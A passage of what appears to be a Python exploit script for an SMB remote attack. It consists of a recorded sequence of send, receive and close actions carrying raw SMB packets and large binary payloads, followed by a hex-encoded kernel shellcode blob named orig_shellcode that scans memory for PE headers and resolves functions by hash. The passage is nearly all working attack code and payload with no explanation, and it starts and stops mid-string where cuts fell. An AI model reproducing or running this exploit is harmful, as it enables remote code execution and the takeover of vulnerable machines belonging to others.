1\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA H\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA$H\\\\x01\\\\xf0^\\\\xc3H\\\\xd1\\\\xe1H\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3H\\\\x81\\\\xca\\\\x00\\\\x00\\\\xff\\\\xffH\\\\x81\\\\xf2\\\\x00\\\\x00\\\\xff\\\\xffH\\\\xc1\\\\xe2\\\\x02H\\\\x01\\\\xd1H1\\\\xd2\\\\x8b\\\\x11H\\\\x01\\\\xd0\\\\xc3WVSUATAUAVAWI\\\\x89\\\\xe4H\\\\x81\\\\xec\\\\x08\\\\x01\\\\x00\\\\x00I\\\\x89\\\\xcfH\\\\x8d-\\\\xe0\\\\xff\\\\xff\\\\xfff\\\\x81\\\\xe5\\\\x00\\\\xf0H\\\\x89MXH1\\\\xd2f\\\\x8bQ\\\\x02H\\\\x01\\\\xcaH;\\\\x11t\\\\x06H\\\\x8dI\\\\x08\\\\xeb\\\\xf5H\\\\x8dA(H\\\\x89E4H\\\\x8bA\\\\xf0H\\\\x89E(\\\\xe8(\\\\x01\\\\x00\\\\x00\\\\xe8{\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xed\\\\x00\\\\x00\\\\x00L\\\\x8bm<A\\\\x8bM\\\\xbc\\\\xe8\\\\xf9\\\\x00\\\\x00\\\\x00<#t\\\\r<wt\\\\x1d<\\\\xc8t#\\\\xe9\\\\xbd\\\\x00\\\\x00\\\\x00H\\\\x8bM(\\\\x8bED\\\\x89A\\\\x0e\\\\xb0\\\\x01\\\\x88A\\\\x12\\\\xe9\\\\xa5\\\\x00\\\\x00\\\\x00\\\\xe8\\\\xf4\\\\x00\\\\x00\\\\x00\\\\xe9\\\\x9b\\\\x00\\\\x00\\\\x00H1\\\\xdbH1\\\\xf6H1\\\\xffI\\\\x8bE\\\\xd8\\\\x8b\\\\x18\\\\x8bp\\\\x04\\\\x8bx\\\\x08\\\\x8bMH1\\\\xcb1\\\\xce1\\\\xcfA;u\\\\x10u{;]TH\\\\x8bELt\\\\x16\\\\xe8\\\\xd1\\\\x00\\\\x00\\\\x00H\\\\x8dS\\\\x04H1\\\\xc9\\\\xffU\\\\x10H\\\\x89EL\\\\x89]TH\\\\x85\\\\xc0t[H\\\\x01\\\\xf7H9\\\\xdfwOH)\\\\xf7H\\\\x01\\\\xc7WH\\\\x89\\\\xf1QI\\\\x8bu\\\\xe8\\\\xf3\\\\xa4YH\\\\xc1\\\\xe9\\\\x02^\\\\x8bUH1\\\\x16H\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf8H\\\\x01\\\\xd8H9\\\\xc6|!\\\\xffUL\\\\xe8\\\\x81\\\\x00\\\\x00\\\\x00\\\\x8bED\\\\xd1\\\\xe8H1\\\\xc9\\\\x88\\\\xc1H\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89ED\\\\xe8C\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00H\\\\x8bM(\\\\xb4\\\\x00f\\\\x01A\\\\x1eH\\\\x8bE L\\\\x89\\\\xf9L\\\\x89\\\\xe4A_A^A]A\\\\\\\\][^_\\\\xff`x1\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bED\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89EHY\\\\xc3Q\\\\xe8\\\\x0e\\\\x00\\\\x00\\\\x00H\\\\x8bE H\\\\x8bHxH\\\\x89HpY\\\\xc3SWH\\\\x83\\\\xec(H\\\\x8b]LH\\\\x85\\\\xdbt\\\\x131\\\\xc0H\\\\x89\\\\xdfH1\\\\xc9\\\\x8bMT\\\\xf3\\\\xaaH\\\\x89\\\\xd9\\\\xffU\\\\x18H1\\\\xc0\\\\x89ETH\\\\x89ELH\\\\x83\\\\xc4(_[\\\\xc3QVWH\\\\x8bu4H\\\\x8b\\\\x0e\\\\xe8H\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0u\\\\x11H\\\\x8dv\\\\x08H\\\\x8b\\\\x0e\\\\xe87\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0t+H\\\\x89M4j\\\\x0cXH\\\\x8d\\\\xb1\\\\x90\\\\x00\\\\x00\\\\x00;\\\\x06t\\\\x08H\\\\x83\\\\xc6\\\\x08;\\\\x06u\\\\x11;F\\\\x04u\\\\x0cH\\\\x89u<H1\\\\xc0H\\\\xff\\\\xc0\\\\xeb\\\\x03H1\\\\xc0_^Y\\\\xc3H1\\\\xc0H9\\\\xc1}\\\\x03H\\\\xff\\\\xc0\\\\xc3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('send', 20, b'\\\\x89\\\\xecA_A^A]A\\\\\\\\^_][\\\\xc3SRQUH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x00\\\\x01\\\\x00\\\\x00WH\\\\x89\\\\xcfH\\\\x89\\\\xd8H\\\\x89\\\\x85\\\\x00\\\\xff\\\\xff\\\\xff\\\\xe8\\\\xbb\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8H\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x10\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x9a\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x18\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x8f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85 \\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x84\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xf9H\\\\x8b\\\\x95 \\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x9d\\\\x10\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x0f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x850\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d0\\\\xff\\\\xff\\\\xff\\\\xe8U\\\\x01\\\\x00\\\\x00f\\\\x89\\\\xc2H\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x18\\\\xff\\\\xff\\\\xff\\\\xe8I\\\\x01\\\\x00\\\\x00_H\\\\x81\\\\xc4\\\\x00\\\\x01\\\\x00\\\\x00]YZ[\\\\xc3VWH1\\\\xf6\\\\x8bp<H\\\\x01\\\\xc6f\\\\x81>PEu\\\\x12H\\\\x81\\\\xc6\\\\x88\\\\x00\\\\x00\\\\x00H1\\\\xff\\\\x8b>H\\\\x01\\\\xf8_^\\\\xc3H1\\\\xc0\\\\xeb\\\\xf8VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x07\\\\x01\\\\xc8H\\\\xff\\\\xc6\\\\xeb\\\\xe7_Y^\\\\xc3VWRH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0H\\\\xff\\\\xc6\\\\xe2\\\\xecZ_^\\\\xc3VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\n\\\\x01\\\\xc8H\\\\xff\\\\xc6H\\\\xff\\\\xc6\\\\xeb\\\\xe4_Y^\\\\xc3VH\\\\x89\\\\xc6H\\\\x83\\\\xc6\\\\x18H1\\\\xc0\\\\x8b\\\\x06^\\\\xc3SeH\\\\x8b\\\\x04%8\\\\x00\\\\x00\\\\x00H\\\\x8b@\\\\x04H\\\\xc1\\\\xe8\\\\x0cH\\\\xc1\\\\xe0\\\\x0cH\\\\x8b\\\\x18f\\\\x81\\\\xfbMZt\\\\x08H-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xee[\\\\xc3WVQH1\\\\xffH\\\\x89\\\\xc6H1\\\\xc0\\\\x8b\\\\x04\\\\xbaH\\\\x01\\\\xf0\\\\xe8@\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x0eH\\\\xff\\\\xc7H9\\\\xdft\\\\x0b\\\\xeb\\\\xe4Y^_\\\\xc3H\\\\x89\\\\xf8\\\\xeb\\\\xf7H1\\\\xc0\\\\xeb\\\\xf2VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA\\\\x1cH\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA H\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA$H\\\\x01\\\\xf0^\\\\xc3H\\\\xd1\\\\xe1H\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3H\\\\x81\\\\xca\\\\x00\\\\x00\\\\xff\\\\xffH\\\\x81\\\\xf2\\\\x00\\\\x00\\\\xff\\\\xffH\\\\xc1\\\\xe2\\\\x02H\\\\x01\\\\xd1H1\\\\xd2\\\\x8b\\\\x11H\\\\x01\\\\xd0\\\\xc3WVSUATAUAVAWI\\\\x89\\\\xe4H\\\\x81\\\\xec\\\\x08\\\\x01\\\\x00\\\\x00I\\\\x89\\\\xcfH\\\\x8d-\\\\xe0\\\\xff\\\\xff\\\\xfff\\\\x81\\\\xe5\\\\x00\\\\xf0H\\\\x89MXH1\\\\xd2f\\\\x8bQ\\\\x02H\\\\x01\\\\xcaH;\\\\x11t\\\\x06H\\\\x8dI\\\\x08\\\\xeb\\\\xf5H\\\\x8dA(H\\\\x89E4H\\\\x8bA\\\\xf0H\\\\x89E(\\\\xe8(\\\\x01\\\\x00\\\\x00\\\\xe8{\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xed\\\\x00\\\\x00\\\\x00L\\\\x8bm<A\\\\x8bM\\\\xbc\\\\xe8\\\\xf9\\\\x00\\\\x00\\\\x00<#t\\\\r<wt\\\\x1d<\\\\xc8t#\\\\xe9\\\\xbd\\\\x00\\\\x00\\\\x00H\\\\x8bM(\\\\x8bED\\\\x89A\\\\x0e\\\\xb0\\\\x01\\\\x88A\\\\x12\\\\xe9\\\\xa5\\\\x00\\\\x00\\\\x00\\\\xe8\\\\xf4\\\\x00\\\\x00\\\\x00\\\\xe9\\\\x9b\\\\x00\\\\x00\\\\x00H1\\\\xdbH1\\\\xf6H1\\\\xffI\\\\x8bE\\\\xd8\\\\x8b\\\\x18\\\\x8bp\\\\x04\\\\x8bx\\\\x08\\\\x8bMH1\\\\xcb1\\\\xce1\\\\xcfA;u\\\\x10u{;]TH\\\\x8bELt\\\\x16\\\\xe8\\\\xd1\\\\x00\\\\x00\\\\x00H\\\\x8dS\\\\x04H1\\\\xc9\\\\xffU\\\\x10H\\\\x89EL\\\\x89]TH\\\\x85\\\\xc0t[H\\\\x01\\\\xf7H9\\\\xdfwOH)\\\\xf7H\\\\x01\\\\xc7WH\\\\x89\\\\xf1QI\\\\x8bu\\\\xe8\\\\xf3\\\\xa4YH\\\\xc1\\\\xe9\\\\x02^\\\\x8bUH1\\\\x16H\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf8H\\\\x01\\\\xd8H9\\\\xc6|!\\\\xffUL\\\\xe8\\\\x81\\\\x00\\\\x00\\\\x00\\\\x8bED\\\\xd1\\\\xe8H1\\\\xc9\\\\x88\\\\xc1H\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89ED\\\\xe8C\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00H\\\\x8bM(\\\\xb4\\\\x00f\\\\x01A\\\\x1eH\\\\x8bE L\\\\x89\\\\xf9L\\\\x89\\\\xe4A_A^A]A\\\\\\\\][^_\\\\xff`x1\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bED\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89EHY\\\\xc3Q\\\\xe8\\\\x0e\\\\x00\\\\x00\\\\x00H\\\\x8bE H\\\\x8bHxH\\\\x89HpY\\\\xc3SWH\\\\x83\\\\xec(H\\\\x8b]LH\\\\x85\\\\xdbt\\\\x131\\\\xc0H\\\\x89\\\\xdfH1\\\\xc9\\\\x8bMT\\\\xf3\\\\xaaH\\\\x89\\\\xd9\\\\xffU\\\\x18H1\\\\xc0\\\\x89ETH\\\\x89ELH\\\\x83\\\\xc4(_[\\\\xc3QVWH\\\\x8bu4H\\\\x8b\\\\x0e\\\\xe8H\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0u\\\\x11H\\\\x8dv\\\\x08H\\\\x8b\\\\x0e\\\\xe87\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0t+H\\\\x89M4j\\\\x0cXH\\\\x8d\\\\xb1\\\\x90\\\\x00\\\\x00\\\\x00;\\\\x06t\\\\x08H\\\\x83\\\\xc6\\\\x08;\\\\x06u\\\\x11;F\\\\x04u\\\\x0cH\\\\x89u<H1\\\\xc0H\\\\xff\\\\xc0\\\\xeb\\\\x03H1\\\\xc0_^Y\\\\xc3H1\\\\xc0H9\\\\xc1}\\\\x03H\\\\xff\\\\xc0\\\\xc3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('send', 21, b'\\\\x89\\\\xecA_A^A]A\\\\\\\\^_][\\\\xc3SRQUH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x00\\\\x01\\\\x00\\\\x00WH\\\\x89\\\\xcfH\\\\x89\\\\xd8H\\\\x89\\\\x85\\\\x00\\\\xff\\\\xff\\\\xff\\\\xe8\\\\xbb\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8H\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x10\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x9a\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x18\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x8f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85 \\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x84\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xf9H\\\\x8b\\\\x95 \\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x9d\\\\x10\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x0f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x850\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d0\\\\xff\\\\xff\\\\xff\\\\xe8U\\\\x01\\\\x00\\\\x00f\\\\x89\\\\xc2H\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x18\\\\xff\\\\xff\\\\xff\\\\xe8I\\\\x01\\\\x00\\\\x00_H\\\\x81\\\\xc4\\\\x00\\\\x01\\\\x00\\\\x00]YZ[\\\\xc3VWH1\\\\xf6\\\\x8bp<H\\\\x01\\\\xc6f\\\\x81>PEu\\\\x12H\\\\x81\\\\xc6\\\\x88\\\\x00\\\\x00\\\\x00H1\\\\xff\\\\x8b>H\\\\x01\\\\xf8_^\\\\xc3H1\\\\xc0\\\\xeb\\\\xf8VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x07\\\\x01\\\\xc8H\\\\xff\\\\xc6\\\\xeb\\\\xe7_Y^\\\\xc3VWRH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0H\\\\xff\\\\xc6\\\\xe2\\\\xecZ_^\\\\xc3VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\n\\\\x01\\\\xc8H\\\\xff\\\\xc6H\\\\xff\\\\xc6\\\\xeb\\\\xe4_Y^\\\\xc3VH\\\\x89\\\\xc6H\\\\x83\\\\xc6\\\\x18H1\\\\xc0\\\\x8b\\\\x06^\\\\xc3SeH\\\\x8b\\\\x04%8\\\\x00\\\\x00\\\\x00H\\\\x8b@\\\\x04H\\\\xc1\\\\xe8\\\\x0cH\\\\xc1\\\\xe0\\\\x0cH\\\\x8b\\\\x18f\\\\x81\\\\xfbMZt\\\\x08H-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xee[\\\\xc3WVQH1\\\\xffH\\\\x89\\\\xc6H1\\\\xc0\\\\x8b\\\\x04\\\\xbaH\\\\x01\\\\xf0\\\\xe8@\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x0eH\\\\xff\\\\xc7H9\\\\xdft\\\\x0b\\\\xeb\\\\xe4Y^_\\\\xc3H\\\\x89\\\\xf8\\\\xeb\\\\xf7H1\\\\xc0\\\\xeb\\\\xf2VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA\\\\x1cH\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA H\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA$H\\\\x01\\\\xf0^\\\\xc3H\\\\xd1\\\\xe1H\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3H\\\\x81\\\\xca\\\\x00\\\\x00\\\\xff\\\\xffH\\\\x81\\\\xf2\\\\x00\\\\x00\\\\xff\\\\xffH\\\\xc1\\\\xe2\\\\x02H\\\\x01\\\\xd1H1\\\\xd2\\\\x8b\\\\x11H\\\\x01\\\\xd0\\\\xc3WVSUATAUAVAWI\\\\x89\\\\xe4H\\\\x81\\\\xec\\\\x08\\\\x01\\\\x00\\\\x00I\\\\x89\\\\xcfH\\\\x8d-\\\\xe0\\\\xff\\\\xff\\\\xfff\\\\x81\\\\xe5\\\\x00\\\\xf0H\\\\x89MXH1\\\\xd2f\\\\x8bQ\\\\x02H\\\\x01\\\\xcaH;\\\\x11t\\\\x06H\\\\x8dI\\\\x08\\\\xeb\\\\xf5H\\\\x8dA(H\\\\x89E4H\\\\x8bA\\\\xf0H\\\\x89E(\\\\xe8(\\\\x01\\\\x00\\\\x00\\\\xe8{\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xed\\\\x00\\\\x00\\\\x00L\\\\x8bm<A\\\\x8bM\\\\xbc\\\\xe8\\\\xf9\\\\x00\\\\x00\\\\x00<#t\\\\r<wt\\\\x1d<\\\\xc8t#\\\\xe9\\\\xbd\\\\x00\\\\x00\\\\x00H\\\\x8bM(\\\\x8bED\\\\x89A\\\\x0e\\\\xb0\\\\x01\\\\x88A\\\\x12\\\\xe9\\\\xa5\\\\x00\\\\x00\\\\x00\\\\xe8\\\\xf4\\\\x00\\\\x00\\\\x00\\\\xe9\\\\x9b\\\\x00\\\\x00\\\\x00H1\\\\xdbH1\\\\xf6H1\\\\xffI\\\\x8bE\\\\xd8\\\\x8b\\\\x18\\\\x8bp\\\\x04\\\\x8bx\\\\x08\\\\x8bMH1\\\\xcb1\\\\xce1\\\\xcfA;u\\\\x10u{;]TH\\\\x8bELt\\\\x16\\\\xe8\\\\xd1\\\\x00\\\\x00\\\\x00H\\\\x8dS\\\\x04H1\\\\xc9\\\\xffU\\\\x10H\\\\x89EL\\\\x89]TH\\\\x85\\\\xc0t[H\\\\x01\\\\xf7H9\\\\xdfwOH)\\\\xf7H\\\\x01\\\\xc7WH\\\\x89\\\\xf1QI\\\\x8bu\\\\xe8\\\\xf3\\\\xa4YH\\\\xc1\\\\xe9\\\\x02^\\\\x8bUH1\\\\x16H\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf8H\\\\x01\\\\xd8H9\\\\xc6|!\\\\xffUL\\\\xe8\\\\x81\\\\x00\\\\x00\\\\x00\\\\x8bED\\\\xd1\\\\xe8H1\\\\xc9\\\\x88\\\\xc1H\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89ED\\\\xe8C\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00H\\\\x8bM(\\\\xb4\\\\x00f\\\\x01A\\\\x1eH\\\\x8bE L\\\\x89\\\\xf9L\\\\x89\\\\xe4A_A^A]A\\\\\\\\][^_\\\\xff`x1\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bED\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89EHY\\\\xc3Q\\\\xe8\\\\x0e\\\\x00\\\\x00\\\\x00H\\\\x8bE H\\\\x8bHxH\\\\x89HpY\\\\xc3SWH\\\\x83\\\\xec(H\\\\x8b]LH\\\\x85\\\\xdbt\\\\x131\\\\xc0H\\\\x89\\\\xdfH1\\\\xc9\\\\x8bMT\\\\xf3\\\\xaaH\\\\x89\\\\xd9\\\\xffU\\\\x18H1\\\\xc0\\\\x89ETH\\\\x89ELH\\\\x83\\\\xc4(_[\\\\xc3QVWH\\\\x8bu4H\\\\x8b\\\\x0e\\\\xe8H\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0u\\\\x11H\\\\x8dv\\\\x08H\\\\x8b\\\\x0e\\\\xe87\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0t+H\\\\x89M4j\\\\x0cXH\\\\x8d\\\\xb1\\\\x90\\\\x00\\\\x00\\\\x00;\\\\x06t\\\\x08H\\\\x83\\\\xc6\\\\x08;\\\\x06u\\\\x11;F\\\\x04u\\\\x0cH\\\\x89u<H1\\\\xc0H\\\\xff\\\\xc0\\\\xeb\\\\x03H1\\\\xc0_^Y\\\\xc3H1\\\\xc0H9\\\\xc1}\\\\x03H\\\\xff\\\\xc0\\\\xc3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('close', 3, 9.967667061999236)\", \"('close', 4, 0.0)\", \"('close', 5, 0.0)\", \"('close', 6, 0.0)\", \"('close', 7, 0.0)\", \"('close', 8, 0.0)\", \"('close', 9, 0.0)\", \"('close', 10, 0.0)\", \"('close', 11, 0.0)\", \"('close', 12, 0.0)\", \"('close', 13, 0.0)\", \"('close', 14, 0.0)\", \"('close', 15, 0.0)\", \"('close', 17, 0.0)\", \"('send', 1, b'\\\\x00\\\\x00\\\\x00#\\\\xffSMBq\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18\\\\x07\\\\xc0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00__TREEID__PLACEHOLDER__\\\\xff\\\\xfe__USERID__PLACEHOLDER__@\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('close', 18, 0.0)\", \"('close', 19, 0.0)\", \"('close', 20, 0.0)\", \"('close', 21, 0.0)\", \"('recv', 1, 0.0)\", '(\\'send\\', 1, b\"\\\\x00\\\\x00\\\\x00\\'\\\\xffSMBt\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18\\\\x07\\\\xc0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00__TREEID__PLACEHOLDER__\\\\xff\\\\xfe__USERID__PLACEHOLDER__@\\\\x00\\\\x02\\\\xff\\\\x00\\'\\\\x00\\\\x00\\\\x00\", 0.0)', \"('recv', 1, 0.0)\", \"('close', 1, 0.0)\"]\r\n datfile = [ast.literal_eval(i) for i in datfile]\r\n orig_shellcode = binascii.unhexlify(b'31c040907408e809000000c22400e8a7000000c3e801000000eb905bb9760100000f32a3fcffdfff8d431731d20f30c3b9230000006a300fa18ed98ec1648b0d400000008b6104ff35fcffdfff609c6a23529c6a0283c2089d804c2401026a1bff350403dfff6a0055535657648b1d1c0000006a3b8bb324010000ff3331c04889038b6e286a0183ec4881ed9c020000a1fcffdfffb97601000031d20f30fbe811000000fa648b0d400000008b610483ec289d61c3e9ef000000b9820000c00f3248bbf80fd0ffffffffff8953048903488d050a0000004889c248c1ea200f30c30f01f865488924251000000065488b2425a801000050535152565755415041514152415341544155415641576a2b65ff34251000000041536a33514c89d14883ec08554881ec58010000488dac248000000048899dc00000004889bdc80000004889b5d000000048a1f80fd0ffffffffff4889c248c1ea204831dbffcb4821d84831c9b9820000c00f30fbe838000000fa65488b2425a80100004883ec78415f415e415d415c415b415a415941585d5f5e5a595b5865488b2425100000000f01f8ff2425f80fd0ff31c040900f84b5050000e800000000586089c389e583ec48648b0d38000000668b4106c1e010668b01662500f08b086681f94d5a74072d00100000ebf08945fc5389c3b9940169e3e83e0100008945f8b9855483f0e8310100008945f4b92e5b51d2e8240100008945ec5b8d55e831c9890a526a00526a0bffd08b55e885d20f8402010000526a00ff55f885c00f84f4000000506a00ff75e8506a0bff55ec85c00f85e000000058502dfc000000051c01000050e880010000b9fa3cadc239c8741eb91abd4b2b39c87415588b55e881ea1c0100000f8cac0000008955e8ebce588b70ecff55f489f05050682e6461746a61e82702000085c00f84880000005883e940e85a02000085c074158b16c1ea1889f0c1e81839d075078b464885c0740a83c60483e904e35eebd88975f05668f80f00006a00ff55f885c0744a5089c731c089c16681c10004f3ab5889008b550489500431d78b55f889500831d78b55f489500c31d78b55f089501031d789782483c04889c78db396030000b91a020000f3a45b89433889ec61c3535251575589e583ec1889cf89d88945fce87a00000085c0746d8945f8e8ee0000008945f48b45fc8b4df8e80e01000085c074538945f08b45fc8b4df8e80401000085c074418945ec8b45fc8b4df8e8fa00000085c0742f8945e88b45fc89f98b55ec8b5df4e8ab00000085c0741889c18b45e8e8dd0000006689c28b45fc8b4df0e8d700000083c4185d5f595a5bc35689c683c63c8b3601c666813e5045750983c6788b3601f05ec331c0ebfa56515789c631c089c7c1e70729c789f831c98a0e80f900740501c846ebe95f595ec356575289c631c089c7c1e70729c789f831d28a1601d046e2ee5a5f5ec356515789c631c089c7c1e70729c789f831c98a0e80f90074c601c84646ebe85f595ec383c0188b00c357565131ff89c639df74198b04ba01f0e883ffffff39c8740747ebeb595e5fc389f8ebf831c0ebf483c11c8b0901c8c383c1208b0901c8c383c1248b0901c8c3d1e101c8668b00c381e2ffff0000c1e20201d18b0901c8c352568b74240c8b4c241031d2d1e985c9740cc1c205ac460c2030c249ebf089d05e5ac20800585a5f5e505689f083c63c8b3601c631c089c1668b4e06668b461401c683c61885c9741d8b0639f875078b460439d0740683c62849ebe98b460c8b4e085e01c6c331f6c36031c083f80f741e31c98b3c868b148e39d774034175f30fb694038703000039d1750d40ebdd4139c875056131c040c36131c0c3000102030405060708090a09090d0e8b4c240860e8000000005d6681e500f0894d34e8d9010000e843010000e87f01000085c00f84e30000008b5d3c8b4bd8e8170100003c23740d3c77741c3cc87422e9b60000008b4d388b452489410e31c0884112e99f000000e81